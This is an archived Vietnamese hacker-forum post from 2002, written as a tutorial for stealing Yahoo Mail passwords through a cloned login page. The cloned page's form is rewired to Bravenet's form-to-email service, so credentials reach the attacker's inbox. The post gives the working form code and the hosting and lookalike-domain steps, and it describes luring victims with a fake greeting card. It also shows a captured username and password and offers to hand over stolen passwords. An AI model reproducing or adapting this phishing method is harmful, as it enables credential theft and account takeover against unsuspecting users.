Site hosted by Angelfire.com: Build your free website today!

 

1.You are viewing "ăn cắp' password qua webserver trung gian, 100% thanh cong by ctqterrorist(elite member)

-------------------------------------------------------------------------

Gởi bởi: ctqterrorist hôm 12 Thg.6, 2002 - 04:10 PM

Bai viet thu :124
Buoc1:vao` www.mail.yahoo.com
An ctrl+a de ghi lai toan bo trang nay(vao file-> save as)
vd:tui ghi la quan
Sau do ta se duoc thu muc "quan_files" chua cac file gif
va file quan.htm

Buoc2
Vao web trung gian la http://www.bravenet.com

Sau do' dang ki' lam` menber o day ( Nho la phai danh dung dia chi email)

Khi do la menber ban vao login sau do dang ki de gia nhap brave.net

Sau khi da dang nhap (login) ban vao muc Email forms sau do' vao` muc

Copy/paste code


Ban co duoc so code cua ban va ban copy no lai (ghi lai duoi dang file txt)


Lay' vd cua tui khi tui khi copy ve la`

<!---------------- BEGIN BRAVENET CODE -------------->






 

<form action="http://pub18.bravenet.com/emailfwd/senddata.php"
method="post" enctype="multipart/form-data">
<input type="hidden" name="usernum" value="1544102702" />
<input type="hidden" name="cpv" value="1" />
<table cellpadding="0" cellspacing="0" border="0"
bgcolor="#999999">

<table border="0" cellpadding="10" cellspacing="1"
bgcolor="#999999">

What is your
name?

<input type="text" name="name" size="20" />

Where are you
from?

<input type="text" name="where" size="20" />

E-mail
address?

<input type="text" name="replyemail" size="20">




<input type="submit" name="submit" value=" Send ">
<input type="reset" name="reset" value=" Clear ">





<img src="http://images.bravenet.com/brpics/formbutt.gif" border="0"
width="100" height="35" />
</form>


Trong do' can luu y' dong` cuc ki quan trong sau (chi lay dong nay thoi nghen)

<form action="http://pub18.bravenet.com/emailfwd/senddata.php"
method="post" enctype="multipart/form-data">
<input type="hidden" name="usernum" value="1544102702" />
<input type="hidden" name="cpv" value="1" />

Cai' dong` nay` la` de gui pass an cap duoc ve hom thu cua ban

CHu' y' cai' o tren la` vd vi do la cua tui ban se co 1 dong nhu vay chi

co' dieu so' code <input type="hidden" name="usernum" value="1544102702" />

value="1544102702" se~ khac' cua? tui(the' thi moi send ve hom thu cua ban duoc)

Buoc 3
Mo file htm ma ban lay ve(cua tui la quan.htm)

Sau do chen doan code ma brave.net send ve hom thu cho ban mo  *.htm cua ban len roi nhan chuot phai vao view source
roi chen doan code vao phan dau cua source

<form action="http://pub18.bravenet.com/emailfwd/senddata.php"
method="post" enctype="multipart/form-data">
<input type="hidden" name="usernum" value="1544102702" />
<input type="hidden" name="cpv" value="1" />

nho' la chen o dong dau cua htm 

Sau do' save htm lai the la ok

Sau do ban chi viec upload htm le yahoo geotities,roi dang ki web o www.dk3.com

Dang ki domains sau do o phan real url ghi cai file htm ma ban da sau va upload len

o yahoogeocities cai nay chac ai cung biet nen tui noi nhanh

Sau do du victim vao hom thu qua trang web cua ban tren dk3 la ok id va pass se duoc gui ve

hom thu cua ban voi nguoi gui la notify@brave.net.com

Luu y'

Ban nhat thiet phai la menber cua brave.net dang ki rat de va phai vao phan ve email

De duoc brave gui doan code cho ban vd code cua tui la

<input type="hidden" name="usernum" value="1544102702" />

Cai so code cua ban se khong phai la so 1544102702 ma la so khac(co' the thi ip va pass moi send


ve hom thu cua ban duoc)
Va ban can du victim danh dung' pass vi` cai trang nay se k0 vo yahoo ma vo qua www.brave.net

vi` the ta chi lua duoc victim 1 lan thoi voi victim biet may tinh

con voi dan chat thi k0 sao vi ho k0 hieu dau

Sau day la vd cua tui (khi tui no danh user va pass vao



Date/Time of Posting: Jun 18 2002 / 03:45:31
IP Address: 203.162.122.103

userid = ctq
_tries =
_src = ym
_last =
promo =
_intl = us
_bypass =
_partner =
_u = 31vvqn0ugtvgs
_v = 0
_challenge = 1hQHKlW4Yo3PJEFkK_URdlDhfqX8
_emailCode =
hasMsgr = 0
_chkP = Y
_done =
login = quandaica
passwd = chutamquan
_save = Sign In

 

Upload len dk3 de cho no don gian vi du www.mail1.yahoo1.dk3.com roi ra ngoai tiem set homepage khi victim danh username va pass thi se khong canh ma bay ve hop thu ta hehehehehe hoac gui cho victim thu lam quen roi gia bo noi voi victim cai dia chi nay la thiep greeting card bam vao day de xem card muon xem phai dang ki vao yahoo…


Ai k0 lam` duoc thi du victim qua www.duc.dk3.com (trang web cua dai ca tui ,ban khong nen vao vi se bi mat password day,tui co 1 cai trangweb
www.ctq.dk3.com nhung bi firewall pha roi )xong roi mail cho tui ,tui se dua pass cua no cho

Co' the thay id cua victim o o login con` pass o o^ passwd

Hi vong tui duoc thang chuc ^_^

Ai thac mac thi mail cho tui
ctqterrorist@yahoo.com

-------------------------------------------------------------------------

Ctqterrorist

Elite member **

Thanh vien thu 21345 cua HVA

So bai viet :124 (0.24%so voi tong so bai viet tren forum)

KILL ME IF YOU CAN